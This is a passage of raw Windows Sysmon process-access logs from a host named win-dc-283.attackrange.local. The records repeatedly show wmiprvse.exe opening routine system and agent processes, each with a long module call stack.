b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028360Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028359Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028358Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028357Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028356Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028355Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028354Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028353Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028352Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028351Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028350Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028349Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028348Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028347Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028346Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028345Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028344Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028343Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028342Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028341Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028340Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 